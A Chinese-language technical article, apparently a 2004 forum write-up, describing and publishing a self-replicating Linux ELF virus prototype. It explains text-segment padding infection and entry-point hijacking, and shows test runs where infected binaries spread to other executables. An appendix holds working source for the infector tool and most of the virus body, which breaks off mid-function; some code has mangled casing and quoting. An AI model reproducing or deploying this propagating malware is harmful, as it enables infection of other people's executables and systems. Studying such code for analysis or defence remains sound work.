|
一、 ** 介绍
写这篇文章的目的主要是对最近写的一个linux病毒原型代码做一个总结,
同时向对这方面有兴趣的朋友做一个简单的介绍。
阅读这篇文章你需要一些知识,要对elf有所了解、能够阅读一些嵌入
了汇编的c代码、了解病毒的基本工作原理。
二、 ** elf infector (elf文件感染器)
为了制作病毒文件,我们需要一个elf文件感染器,用于制造第一个带毒文件。
对于elf文件感染技术,在silvio cesare的《unix elf parasites and virus》
一文中已经有了一个非常好的分析、描述,在这方面我还没有发现可以对其进行补充的
地方,因此在这里我把silvio cesare对elf infection过程的总结贴出来,以供参考:
the final algorithm is using this information is.
* increase p_shoff by page_size in the elf header
* patch the insertion code (parasite) to jump to the entry point
(original)
* locate the text segment program header
* modify the entry point of the elf header to point to the new
code (p_vaddr + p_filesz)
* increase p_filesz by account for the new code (parasite)
* increase p_memsz to account for the new code (parasite)
* for each phdr who"s segment is after the insertion (text segment)
* increase p_offset by page_size
* for the last shdr in the text segment
* increase sh_len by the parasite length
* for each shdr who"s section resides after the insertion
* increase sh_offset by page_size
* physically insert the new code (parasite) and pad to page_size, into
the file - text segment p_offset + p_filesz (original)
在linux病毒原型中所使用的gei - elf infector即是根据这个原理写的。在
附录中你可以看到这个感染工具的源代码: g-elf-infector.c
g-elf-infector与病毒是独立开的,其只在制作第一个病毒文件时被使用。我简单介
绍一下它的使用方法,g-elf-infector.c可以被用于任何希望--将二进制代码插入到
指定文件的文本段,并在目标文件执行时首先被执行--的用途上。g-elf-infector.c
的接口很简单,你只需要提供以下三个定义:
* 存放你的二进制代码返回地址的地址,这里需要的是这个地址与代码起始
地址的偏移,用于返回到目标程序的正常入口
#define paracode_retaddr_addr_offset 1232
* 要插入的二进制代码(由于用c编写,所以这里需要以一个函数的方式提供)
void parasite_code(void);
* 二进制代码的结束(为了易用,这里用一个结尾函数来进行代码长度计算)
void parasite_code_end(void);
parasite_code_end应该是parasite_code函数后的第一个函数定义,通常应该如下表示
void parasite_code(void)
{
...
...
...
}
void parasite_code_end(void) {}
在这里存在一个问题,就是编译有可能在编译时将parasite_code_end放在parasite_code
地址的前面,这样会导致计算代码长度时失败,为了避免这个问题,你可以这样做
void parasite_code(void)
{
...
...
...
}
void parasite_code_end(void) {parasite_code();}
有了这三个定义,g-elf-infector就能正确编译,编译后即可用来elf文件感染
~grip2@linux> ./gei foo
三、** 病毒原型的工作过程
1 首先通过elf infector将病毒代码感染到一个elf文件,这样就创造了第一
个带毒文件,后续的传播就由它来完成。
2 当带毒文件被执行时,会首先跳到病毒代码开始执行。
3 病毒代码开始发作,在这个原型里,病毒会直接开始传播。
4 病毒遍历当前目录下的每一个文件,如果是符合条件的elf文件就开始感染。
5 病毒的感染过程和elf infector的过程类似,但由于工作环境的不同,
代码的实现也是有较大区别的。
6 目前传染对elf文件的基本要求是文本段要有剩余空间能够容纳病毒代码,
如果无法满足,病毒会忽略此elf。对于被感染过一次的elf文件,文本段将不会有
剩余的空间,因此二次感染是不会发生的。
7 病毒代码执行过后,会恢复堆栈和所有寄存器(这很重要),然后跳回到
真正的可执行文件入口,开始正常的运行过程。
上面对病毒原型的工作过程的介绍也许显得千篇一律了,和我们早就熟知的
关于病毒的一些介绍没有什么区别?是的,的确是这样,原理都是类似的,关键是要看
实现。下面我们就将通过对一些技术问题的分析来了解具体的实现思路。
四、** 关键技术问题及处理
1 elf文件执行流程重定向和代码插入
在elf文件感染的问题上,elf infector与病毒传播时调用的infect_virus思路是一样的:
* 定位到文本段,将病毒的代码接到文本段的尾部。这个过程的关键是要熟悉
elf文件的格式,将病毒代码复制到文本段尾部后,能够根据需要调整文本段长度改变
所影响到的后续段(segment)或节(section)的虚拟地址。同时注意把新引入的文本段部
分与一个.setion建立关联,防止strip这样的工具将插入的代码去除。还有一点就是要
注意文本段增加长度的对齐问题,见elf文档中的描述:
p_align
as ``program loading"" later in this part describes, loadable
process segments must have congruent values for p_vaddr and
p_offset, modulo the page size.
* 通过过将elf文件头中的入口地址修改为病毒代码地址来完成代码重定向:
/* modify the entry point of the elf */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
2 病毒代码如何返回到真正的elf文件入口
方法技巧应该很多,这里采用的方法是push+ret组合:
__asm__ volatile (
...
"return:\n\t"
"push $0xaabbccdd\n\t" /* push ret_addr */
"ret\n"
::);
其中0xaabbccdd处存放的是真正的程序入口地址,这个值在插入病毒代码时由感染程
序来填写。
3 堆栈和寄存器的恢复
病毒代码必须保证运行前、后的堆栈和寄存器内容完全相同,这通过增加额外的代码
来完成。
在进入时:
__asm__ volatile (
"push %%eax\n\t"
"push %%ecx\n\t"
"push %%edx\n\t"
::);
退出时:
__asm__ volatile (
"popl %%edx\n\t"
"popl %%ecx\n\t"
"popl %%eax\n\t"
"addl $0x102c, %%esp\n\t"
"popl %%ebx\n\t"
"popl %%esi\n\t"
"popl %%edi\n\t"
"popl %%ebp\n\t"
"jmp return\n"
要注意上面的代码是根据特定的编译器、编译选项来调整的,在不同的环境下如果重
新编译病毒程序,可能还需要做一些调整。
4 字符串的使用
write(1, "hello world\n", 12);
在病毒代码中这样对一个字符串直接引用是不可以的。这是对字符串的使用是一个绝
对地址引用,病毒代码在进入到一个新的宿主内后,这一绝对地址的内容是无法得到
保证的,因此在病毒代码内应该使用相对地址或间接地址进行字符串访问。
下面是silvio cesare的《unix elf parasites and virus》中的一个解决办法,利用
了缓冲区溢出中shellcode的编写技术:
in x86 linux, some syscalls require the use of an absolute address pointing to
initialized data. this can be made relocatable by using a common trick used
in buffer overflow code.
jmp a
b:
pop %eax ; %eax now has the address of the string
. ; continue as usual
.
.
a:
call b
.string \"hello\"
by making a call directly proceeding the string of interest, the address of
the string is pushed onto the stack as the return address.
但是在编写这个linux病毒原型代码时,我并没有使用这个方法,我尽力使代码使用
c语言的语法:
char tmpfile[32] = {"/","t","m","p","/",".","g","v","i","r","u","s","\0"};
#ifndef ndebug
char err_type[32] = {"f","i","l","e"," ","t","y","p","e"," ","n","o","t"," ",
"s","u","p","p","o","r","t","e","d","\n","\0"};
char luck[32] = {"b","e","t","t","e","r"," ","l","u","c","k"," ",
"n","e","x","t"," ","f","i","l","e","\n","\0"};
#endif
在这里将字符串以字符数组的形式出现,编译之后的代码是这样:
...
movb $47, -8312(%ebp)
movb $116, -8311(%ebp)
movb $109, -8310(%ebp)
movb $112, -8309(%ebp)
movb $47, -8308(%ebp)
movb $46, -8307(%ebp)
movb $103, -8306(%ebp)
movb $118, -8305(%ebp)
movb $105, -8304(%ebp)
movb $114, -8303(%ebp)
movb $117, -8302(%ebp)
movb $115, -8301(%ebp)
...
这样带来一个负面影响就是增加了代码长度,但是适当的使用对代码长度影响并不大。
值得注意的一点是,当字符数组定义的尺寸超过了64时,在我的编译环境下,编译器
对代码进行了优化,会导致编译后代码成为:
...
.section .rodata
.lc0:
.byte 47
.byte 116
.byte 109
.byte 112
.byte 47
.byte 46
.byte 103
.byte 118
.byte 105
.byte 114
.byte 117
.byte 115
.byte 0
...
数据被放到了.rodata section中,这样就使得其无法随病毒代码一起进入宿主,会
造成访问失败,所以注意数组的申请尽量保持32以内,防止编译器优化。
除此之外,使用整型数组的方法也与此类似,不再赘述。
5 遭遇gcc-3.3的bug
gvirus.c中有一部分的数据初始化是这样的:
...
char curdir[2] = {".", 0};
char newline = "\n";
curdir[0] = ".";
curdir[1] = 0;
newline = "\n";
if ((curfd = g_open(curdir, o_rdonly, 0)) < 0)
goto out;
...
也许你会奇怪,为什么curdir和newline在已经初始化后还要重新赋值,这其中的原因
是为了绕过一个gcc的bug。
在我的编译环境下,当只做
char curdir[2] = {".", 0};
char newline = "\n";
这样的初始化时,反汇编代码如下:
...
0x08048cb0 <parasite_code+0>: push %ebp
0x08048cb1 <parasite_code+1>: push %edi
0x08048cb2 <parasite_code+2>: push %esi
0x08048cb3 <parasite_code+3>: push %ebx
0x08048cb4 <parasite_code+4>: sub $0x20bc,%esp
0x08048cba <parasite_code+10>: push %eax
0x08048cbb <parasite_code+11>: push %ecx
0x08048cbc <parasite_code+12>: push %edx
0x08048cbd <parasite_code+13>: xor %ecx,%ecx
0x08048cbf <parasite_code+15>: lea 0x4e(%esp),%ebx <-- 使用curdir
0x08048cc3 <parasite_code+19>: mov $0x5,%eax
0x08048cc8 <parasite_code+24>: mov %ecx,%edx
0x08048cca <parasite_code+26>: int $0x80 <-- g_open系统调用
0x08048ccc <parasite_code+28>: mov %eax,0x38(%esp)
0x08048cd0 <parasite_code+32>: cmp $0xffffff82,%eax
0x08048cd3 <parasite_code+35>: jbe 0x8048cdd <parasite_code+45>
0x08048cd5 <parasite_code+37>: movl $0xffffffff,0x38(%esp)
0x08048cdd <parasite_code+45>: mov 0x38(%esp),%eax
0x08048ce1 <parasite_code+49>: test %eax,%eax
0x08048ce3 <parasite_code+51>: js 0x804915d <infect_start+1128>
0x08048ce9 <parasite_code+57>: movw $0x2e,0x4e(%esp) <-- curdir的初始化
...
从注释可以看出,在这种情况下,curdir的初始化被放到了g_open使用其做参数之后。
当加入
curdir[0] = ".";
curdir[1] = 0;
newline = "\n";
后,反汇编代码如下:
...
0x08048cb0 <parasite_code+0>: push %ebp
0x08048cb1 <parasite_code+1>: push %edi
0x08048cb2 <parasite_code+2>: push %esi
0x08048cb3 <parasite_code+3>: push %ebx
0x08048cb4 <parasite_code+4>: sub $0x20bc,%esp
0x08048cba <parasite_code+10>: push %eax
0x08048cbb <parasite_code+11>: push %ecx
0x08048cbc <parasite_code+12>: push %edx
0x08048cbd <parasite_code+13>: xor %ecx,%ecx
0x08048cbf <parasite_code+15>: movw $0x2e,0x4e(%esp) <-- curdir的初始化
0x08048cc6 <parasite_code+22>: lea 0x4e(%esp),%ebx <-- 作为参数使用
0x08048cca <parasite_code+26>: mov $0x5,%eax
0x08048ccf <parasite_code+31>: mov %ecx,%edx
0x08048cd1 <parasite_code+33>: int $0x80 <-- g_open系统调用
...
从注释可以看出,加入了这段代码后,程序编译正确,避免了这个编译器bug。
6 通过c语言和inline保证病毒代码的可读性和可移植性
用汇编写病毒代码的一个缺点就是 - 可读性和可移植性差,这也是使用汇编语言写
程序的一个普遍的缺点。
在这个linux病毒原型代码了主体使用的都是c语言,只有极少部分由于c语言本身的
限制而不得不使用gcc嵌入汇编。对于c语言部分,也尽量是用inline函数,保证代码
层次分明,保证可读性。
7 病毒代码复制时如何获得自己的起始地址?
虽然,病毒代码部分向elf infector提供了代码的起始地址,保证了生成第一个带毒
文件时能够找到代码并插入到目标文件内。但是作为进入宿主内部的代码在进行传播
时却无法使用这个地址,因为它的代码位置已经受到了宿主的影响,这时它需要重新
定位自己的起始位置。
在写这个病毒原型时,我并没有参考过其它病毒的代码,因此这里采用的也许并
不是一个最好的方法:
/* get start address of virus code */
__asm__ volatile (
"jmp get_start_addr\n"
"infect_start:\n\t"
"popl %0\n\t"
:"=m" (para_code_start_addr)
:);
para_code_start_addr -= paracode_retaddr_addr_offset - 1;
... /* c代码 */
...
__asm__ volatile (
...
"get_start_addr:\n\t"
"call infect_start\n"
"return:\n\t"
"push $0xaabbccdd\n\t" /* push ret_addr */
"ret\n"
::);
通过缓冲区溢出中的一个技巧,jmp/call组合来得到push $0xaabbccdd指令的地址。
这个地址是0xaabbccdd地址向后一个push指令,而0xaabbccdd的地址就是那个用于
存放病毒代码返回地址的地址,这个地址相对于病毒代码起始地址的偏移我们是知道
的,就是病毒代码函数向elf infector接口提供的那个宏定义的值:
#ifndef ndebug
#define paracode_retaddr_addr_offset 1704
#else
#define paracode_retaddr_addr_offset 1232
#endif
这样病毒代码在当前宿主中的位置就可以得到了(注意从汇编指令出来后,
para_code_start_addr中存放的是0xaabbccdd的地址,我们减去偏移再减
一个push指令的长度,就是病毒代码的起始地址):
para_code_start_addr -= paracode_retaddr_addr_offset - 1;
8 抛弃c库
由于病毒代码要能在不同的elf文件内容工作,所以我们必须要保证所有的相关函数
调用在病毒体内即可完成。而对c库的使用将使我们很难做到这一点,即使有的c库函
数是可以完全内联的(完全内联就是说,这个函数本身可以内联,同时其内部没有向
外的函数调用),但是随着编译环境的不同,这点也是不能得到根本保证的,因此我
们有必要选择抛弃c库。
没有了c库,我们使用到的一些函数调用就必须重新实现。在这个linux病毒原型中有
两种情况,一种是系统调用,另一种是普通的函数。
对于系统调用,我们采用了重新包装的方法:
static inline
g_syscall3(int, write, int, fd, const void *, buf, off_t, count);
static inline
g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
static inline
g_syscall3(int, open, const char *, file, int, flag, int, mode);
static inline
g_syscall1(int, close, int, fd);
static inline
g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot,
int, flags, int, fd, off_t, offset);
static inline
g_syscall2(int, munmap, void *, addr, size_t, len);
static inline
g_syscall2(int, rename, const char *, oldpath, const char *, newpath);
static inline
g_syscall2(int, fstat, int, filedes, struct stat *, buf);
并且修改了syscall包装的宏定义,如
#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)
#define g_syscall0(type,name) \
type g_##name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name)); \
g__syscall_return(type,__res); \
}
对于普通的函数,直接复制一份函数定义:
static inline void * __memcpy(void * to, const void * from, size_t n)
{
int d0, d1, d2;
__asm__ __volatile__(
"rep ; movsl\n\t"
"testb $2,%b4\n\t"
"je 1f\n\t"
"movsw\n"
"1:\ttestb $1,%b4\n\t"
"je 2f\n\t"
"movsb\n"
"2:"
: "=&c" (d0), "=&d" (d1), "=&s" (d2)
:"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from)
: "memory");
return (to);
}
9 保证病毒代码的瘦身需要
为了保证病毒代码体积不至于过于庞大,影响病毒代码的感染,编写代码时也要注意
代码体积问题。由于采用c代码的方式,一些函数调用都是内联的方式,因此每多一个
调用都会引起代码体积的增加。
在进行elf文件读写更是如此,read/write被频繁的调用。为了减小这方面的影响,对
目标elf文件进行了一个mmap处理,这样地址空间直接被映射到文件,就消除了读目标
文件时所要做的read调用,节省了一些空间:
ehdr = g_mmap2(0, stat.st_size, prot_write|prot_read, map_shared, fd, 0);
if (ehdr == map_failed) {
goto err;
}
/* check elf magic-ident */
if (ehdr->e_ident[ei_mag0] != 0x7f
|| ehdr->e_ident[ei_mag1] != "e"
|| ehdr->e_ident[ei_mag2] != "l"
|| ehdr->e_ident[ei_mag3] != "f"
|| ehdr->e_ident[ei_class] != elfclass32
|| ehdr->e_ident[ei_data] != elfdata2lsb
|| ehdr->e_ident[ei_version] != ev_current
|| ehdr->e_type != et_exec
|| ehdr->e_machine != em_386
|| ehdr->e_version != ev_current
) {
v_debug_write(1, &err_type, sizeof(err_type));
goto err;
}
当前的代码都是用c编写,这样很难象汇编代码那样进行更高程度的精简,不过目前的
代码体积还在合理的范围,
在调试状态和标准状态分别是1744和1248
#ifndef ndebug
#define paracode_length 1744
#else
#define paracode_length 1248
#endif
10 数据结构的不一致
与c库的代码调用类似,我们使用的头文件中有一些数据类型的定义是经过
包装的,与系统调用中使用的并不相同。代码相关的两个数据结构,单独提取了出来。
struct dirent {
long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[256]; /* we must not include limits.h! */
};
struct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned short st_mode;
unsigned short st_nlink;
unsigned short st_uid;
unsigned short st_gid;
unsigned long st_rdev;
unsigned long st_size;
unsigned long st_blksize;
unsigned long st_blocks;
unsigned long st_atime;
unsigned long st_atime_nsec;
unsigned long st_mtime;
unsigned long st_mtime_nsec;
unsigned long st_ctime;
unsigned long st_ctime_nsec;
unsigned long __unused4;
unsigned long __unused5;
};
五、** 在一个新的编译环境下的调试方法
grip2@linux:~/tmp/virus> ls
g-elf-infector.c gsyscall.h gunistd.h gvirus.c gvirus.h foo.c makefile parasite-sample.c parasite-sample.h
调整makefile文件,将编译模式改为调试模式,即关掉-dndebug选项
grip2@linux:~/tmp/virus> cat makefile
all: foo gei
gei: g-elf-infector.c gvirus.o
gcc -o2 $< gvirus.o -o gei -wall #-dndebug
foo: foo.c
gcc $< -o foo
gvirus.o: gvirus.c
gcc $< -o2 -c -o gvirus.o -fomit-frame-pointer -wall #-dndebug
clean:
rm *.o -rf
rm foo -rf
rm gei -rf
编译代码
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -o2 -c -o gvirus.o -fomit-frame-pointer -wall #-dndebug
gcc -o2 g-elf-infector.c gvirus.o -o gei -wall #-dndebug
先获取病毒代码长度,然后调整gvirus.c中的#define paracode_length定义
grip2@linux:~/tmp/virus> ./gei -l <-- 这里获取病毒代码的长度
parasite code length: 1744
获取病毒代码开始位置和0xaabbccdd的地址,计算存放返回地址的地址的偏移
grip2@linux:~/tmp/virus> objdump -d gei|grep aabbccdd
8049427: 68 dd cc bb aa push $0xaabbccdd
grip2@linux:~/tmp/virus> objdump -d gei|grep "<parasite_code>"
08048d80 <parasite_code>:
8049450: e9 2b f9 ff ff jmp 8048d80 <parasite_code>
grip2@linux:~/tmp/virus> objdump -d gei|grep "<parasite_code>:"
08048d80 <parasite_code>:
0x8049427与0x8048d80相减即获得我们需要的偏移,
用这个值更新gvirus.h中的#define paracode_retaddr_addr_offset宏的值
重新编译
grip2@linux:~/tmp/virus> make clean
rm *.o -rf
rm foo -rf
rm gei -rf
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -o2 -c -o gvirus.o -fomit-frame-pointer -wall #-dndebug
gcc -o2 g-elf-infector.c gvirus.o -o gei -wall #-dndebug
grip2@linux:~/tmp/virus> ls
gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c
g-elf-infector.c gunistd.h gvirus.h foo makefile parasite-sample.h
建立一个测试目录,测试一下
grip2@linux:~/tmp/virus> mkdir test
grip2@linux:~/tmp/virus> cp gei foo test
grip2@linux:~/tmp/virus> cd test
grip2@linux:~/tmp/virus/test> ls
gei foo
grip2@linux:~/tmp/virus/test> cp foo h
制作带毒程序
grip2@linux:~/tmp/virus/test> ./gei h
file size: 8668
e_phoff: 00000034
e_shoff: 00001134
e_phentsize: 00000020
e_phnum: 00000008
e_shentsize: 00000028
e_shnum: 00000025
text segment file offset: 0
[15 sections patched]
grip2@linux:~/tmp/virus/test> ll
total 44
-rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo
运行带毒程序
grip2@linux:~/tmp/virus/test> ./h
.
..
gei
foo
h
.backup.h
real elf point
grip2@linux:~/tmp/virus/test> ll
total 52
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
测试上面带毒程序运行后,是否感染了其他elf程序
grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
better luck next file
foo
h
better luck next file
.backup.h
better luck next file
real elf point
ok,成功
grip2@linux:~/tmp/virus/test> cp ../foo hh
grip2@linux:~/tmp/virus/test> ll
total 64
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:51 hh
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
better luck next file
foo
h
better luck next file
.backup.h
better luck next file
hh
real elf point
grip2@linux:~/tmp/virus/test>
六、** 最后
由于我既不是一个virus coder也不是一个anti-virus coder,所以对病毒
技术的掌握应该是有欠缺的。如果在文章中对病毒技术的描述不够准确,分析不够到
位,还请指正,谢谢。
七、** 参考文献
1 silvio cesare 的《unix elf parasites and virus》
2 elf文档
3 更多的安全技术交流
http://www.linuxforum.net/forum/showflat.php?cat=&board=security&
number=479955&page=0&view=collapsed&sb=5&o=31&fpart=
八、** 附录 - elf文件感染工具和病毒原型源代码
------------------------------ g-elf_infector.c ------------------------------
/*
* gei - elf infector v0.0.2 (2004)
* written by grip2 <gript2@hotmail.com>
*/
#include <elf.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include "gvirus.h"
#define page_size 4096
#define page_align(a) (((a) + page_size - 1) & ~(page_size - 1))
static int elf_infect(const char *filename,
void *para_code,
unsigned int para_code_size,
unsigned long retaddr_addr_offset);
int main(int argc, char *argv[])
{
#define max_filename_len 256
char backup[max_filename_len*4];
char restore[max_filename_len*4];
if (argc != 2) {
fprintf(stderr,
"gei - elf infector v0.0.2 written by grip2 <gript2@hotmail.com>\n");
fprintf(stderr, "usage: %s <elf-exec-file>\n", argv[0]);
return 1;
}
if (strcmp(argv[1], "-l") == 0) {
fprintf(stderr, "parasite code length: %d\n",
¶site_code_end - ¶site_code);
return 1;
}
if (strlen(argv[1]) > max_filename_len) {
fprintf(stderr, "filename too long!\n");
return 1;
}
sprintf(backup, "cp -f %s .backup.%s\n", argv[1], argv[1]);
sprintf(restore, "cp -f .backup.%s %s\n", argv[1], argv[1]);
system(backup);
if (elf_infect(argv[1], ¶site_code,
¶site_code_end - ¶site_code,
paracode_retaddr_addr_offset) < 0) {
system(restore);
return 1;
}
return 0;
}
static int elf_infect(const char *filename,
void *para_code,
unsigned int para_code_size,
unsigned long retaddr_addr_offset)
{
int fd = -1;
int tmp_fd = -1;
elf32_ehdr *ehdr = null;
elf32_phdr *phdr;
elf32_shdr *shdr;
int i;
int txt_index;
struct stat stat;
int align_code_size;
unsigned long org_entry;
void *new_code_pos;
int tmp_flag;
int size;
unsigned char tmp_para_code[page_size];
char *tmpfile;
tmpfile = tempnam(null, "infector");
fd = open(filename, o_rdwr);
if (fd == -1) {
perror(filename);
goto err;
}
if (fstat(fd, &stat) == -1) {
perror("fstat");
goto err;
}
#ifndef ndebug
printf("file size: %lu\n", stat.st_size);
#endif
ehdr = mmap(0, stat.st_size, prot_write|prot_read, map_shared, fd, 0);
if (ehdr == map_failed) {
perror("mmap ehdr");
goto err;
}
/* check elf magic-ident */
if (ehdr->e_ident[ei_mag0] != 0x7f
|| ehdr->e_ident[ei_mag1] != "e"
|| ehdr->e_ident[ei_mag2] != "l"
|| ehdr->e_ident[ei_mag3] != "f"
|| ehdr->e_ident[ei_class] != elfclass32
|| ehdr->e_ident[ei_data] != elfdata2lsb
|| ehdr->e_ident[ei_version] != ev_current
|| ehdr->e_type != et_exec
|| ehdr->e_machine != em_386
|| ehdr->e_version != ev_current
) {
fprintf(stderr, "file type not supported\n");
goto err;
}
#ifndef ndebug
printf("e_phoff: %08x\ne_shoff: %08x\n",
ehdr->e_phoff, ehdr->e_shoff);
printf("e_phentsize: %08x\n", ehdr->e_phentsize);
printf("e_phnum: %08x\n", ehdr->e_phnum);
printf("e_shentsize: %08x\n", ehdr->e_shentsize);
printf("e_shnum: %08x\n", ehdr->e_shnum);
#endif
align_code_size = page_align(para_code_size);
/* get program header and section header start address */
phdr = (elf32_phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
shdr = (elf32_shdr *) ((unsigned long) ehdr + ehdr->e_shoff);
/* locate the text segment */
txt_index = 0;
while (1) {
if (txt_index == ehdr->e_phnum - 1) {
fprintf(stderr, "invalid e_phnum, text segment not found.\n");
goto err;
}
if (phdr[txt_index].p_type == pt_load
&& phdr[txt_index].p_flags == (pf_r|pf_x)) { /* text segment */
#ifndef ndebug
printf("text segment file offset: %u\n", phdr[txt_index].p_offset);
#endif
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
> phdr[txt_index+1].p_vaddr) {
fprintf(stderr, "better luck next file :-)\n");
goto err;
}
break;
}
txt_index++;
}
/* modify the entry point of the elf */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
new_code_pos =
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;
/* increase the p_filesz and p_memsz of text segment
* for new code */
phdr[txt_index].p_filesz += align_code_size;
phdr[txt_index].p_memsz += align_code_size;
for (i = 0; i < ehdr->e_phnum; i++)
if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
phdr[i].p_offset += align_code_size;
tmp_flag = 0;
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
shdr[i].sh_offset += align_code_size;
if (!tmp_flag && i) { /* associating the new_code to the last
* section in the text segment */
shdr[i-1].sh_size += align_code_size;
tmp_flag = 1;
printf("[%d sections patched]\n", i-1);
}
}
}
/* increase p_shoff in the elf header */
ehdr->e_shoff += align_code_size;
/* make a new file */
tmp_fd = open(tmpfile, o_wronly|o_creat, stat.st_mode);
if (tmp_fd == -1) {
perror("open");
goto err;
}
size = new_code_pos - (void *) ehdr;
if (write(tmp_fd, ehdr, size) != size) {
perror("write");
goto err;
}
memcpy(tmp_para_code, para_code, para_code_size);
memcpy(tmp_para_code + retaddr_addr_offset,
&org_entry, sizeof(org_entry));
if (write(tmp_fd, tmp_para_code, align_code_size) != align_code_size) {
perror("write");
goto err;
}
if (write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
!= stat.st_size - size) {
perror("write");
goto err;
}
close(tmp_fd);
munmap(ehdr, stat.st_size);
close(fd);
if (rename(tmpfile, filename) == -1) {
perror("rename");
goto err;
}
return 0;
err:
if (tmp_fd != -1)
close(tmp_fd);
if (ehdr)
munmap(ehdr, stat.st_size);
if (fd != -1)
close(fd);
return -1;
}
------------------------------ g-elf_infector.c ------------------------------
------------------------------ gvirus.h ------------------------------
#ifndef _g2_parasite_code_
#define _g2_parasite_code_
#ifndef ndebug
#define paracode_retaddr_addr_offset 1704
#else
#define paracode_retaddr_addr_offset 1232
#endif
void parasite_code(void);
void parasite_code_end(void);
#endif
------------------------------ gvirus.h ------------------------------
------------------------------ gvirus.c ------------------------------
/*
* virus code in c (2004)
* written by grip2 <gript2@hotmail.com>
*/
#include "gsyscall.h"
#include "gvirus.h"
#include <elf.h>
#define page_size 4096
#define page_align(a) (((a) + page_size - 1) & ~(page_size - 1))
#ifndef ndebug
#define paracode_length 1744
#else
#define paracode_length 1248
#endif
#ifndef ndebug
#define v_debug_write(...) \
do {\
g_write(__va_args__);\
} while(0)
#else
#define v_debug_write(...)
#endif
static inline int infect_virus(
const char *file,
void *v_code,
unsigned int v_code_size,
unsigned long v_retaddr_addr_offset)
{
int fd = -1;
int tmp_fd = -1;
elf32_ehdr *ehdr = null;
elf32_phdr *phdr;
elf32_shdr *shdr;
int i;
int txt_index;
struct stat stat;
int align_code_size;
unsigned long org_entry;
void *new_code_pos;
int tmp_flag;
int size;
unsigned char tmp_v_code[page_size];
char tmpfile[32] = {"/","t","m","p","/",".","g","v","i","r","u","s","\0"};
#ifndef ndebug
char err_type[32] = {"f","i","l","e"," ","t","y","p","e"," ","n","o","t"," ",
"s","u","p","p","o","r","t","e","d","\n","\0"};
char luck[32] = {"b","e","t","t","e","r"," ","l","u","c","k"," ",
"n","e","x","t"," ","f","i","l","e","\n","\0"};
#endif
fd = g_open(file, o_rdwr, 0);
if (fd == -1) {
goto err;
}
if (g_fstat(fd, &stat) == -1) {
goto err;
}
ehdr = g_mmap2(0, stat.st_size, prot_write|prot_read, map_shared, fd, 0);
if (ehdr == map_failed) {
goto err;
}
/* check elf magic-ident */
if (ehdr->e_ident[ei_mag0] != 0x7f
|| ehdr->e_ident[ei_mag1] != "e"
|| ehdr->e_ident[ei_mag2] != "l"
|| ehdr->e_ident[ei_mag3] != "f"
|| ehdr->e_ident[ei_class] != elfclass32
|| ehdr->e_ident[ei_data] != elfdata2lsb
|| ehdr->e_ident[ei_version] != ev_current
|| ehdr->e_type != et_exec
|| ehdr->e_machine != em_386
|| ehdr->e_version != ev_current
) {
v_debug_write(1, &err_type, sizeof(err_type));
goto err;
}
align_code_size = page_align(v_code_size);
/* get program header and section header start address */
phdr = (elf32_phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
shdr = (elf32_shdr *) ((unsigned long) ehdr + ehdr->e_shoff);
/* locate the text segment */
txt_index = 0;
while (1) {
if (txt_index == ehdr->e_phnum - 1)
goto err;
if (phdr[txt_index].p_type == pt_load
&& phdr[txt_index].p_flags == (pf_r|pf_x)) { /* text segment */
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
> phdr[txt_index+1].p_vaddr) {
v_debug_write(1, &luck, sizeof(luck));
goto err;
}
break;
}
txt_index++;
}
/* modify the entry point of the elf */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
new_code_pos =
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;
/* increase the p_filesz and p_memsz of text segment
* for new code */
phdr[txt_index].p_filesz += align_code_size;
phdr[txt_index].p_memsz += align_code_size;
for (i = 0; i < ehdr->e_phnum; i++)
if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
phdr[i].p_offset += align_code_size;
tmp_flag = 0;
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
shdr[i].sh_offset += align_code_size;
if (!tmp_flag && i) { /* associating the new_code to the last
* section in the text segment */
shdr[i-1].sh_size += align_code_size;
tmp_flag = 1;
}
}
}
/* increase p_shoff in the elf header */
